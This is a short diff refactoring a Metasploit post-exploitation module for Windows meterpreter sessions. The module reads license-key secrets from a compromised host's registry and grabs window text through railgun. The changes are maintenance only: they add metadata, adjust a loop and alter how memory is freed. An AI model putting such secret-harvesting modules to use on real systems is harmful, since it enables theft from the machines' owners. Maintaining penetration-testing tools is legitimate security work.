@@ -23,6 +23,11 @@ class MetasploitModule < Msf::Post
         'Author' => [ 'Nic Losby <blurbdust[at]gmail.com>', 'Kali-Team <kali-team[at]qq.com>'],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -69,7 +74,7 @@ class MetasploitModule < Msf::Post
       { value: 'LicenseKeyAES', description: 'Perpetual License Key' }, # for <= v14
     ]
 
-    keys.each do |parent_key, _child_key|
+    keys.each_key do |parent_key|
       locations.each do |location|
         secret = registry_getvaldata(parent_key, location[:value])
         next if secret.nil?
@@ -135,9 +140,7 @@ class MetasploitModule < Msf::Post
       addr = session.railgun.util.alloc_and_write_wstring('Kali-Team')
       client.railgun.user32.SendMessageW(window_hwnd, 'WM_GETTEXT', 1024, addr)
       text = session.railgun.util.read_wstring(addr)
-      client.railgun.multi([
-        ['kernel32', 'VirtualFree', [addr, 0, MEM_RELEASE]],
-      ])
+      session.railgun.util.free_data(addr)
       if text.strip == ''
         return nil
       else
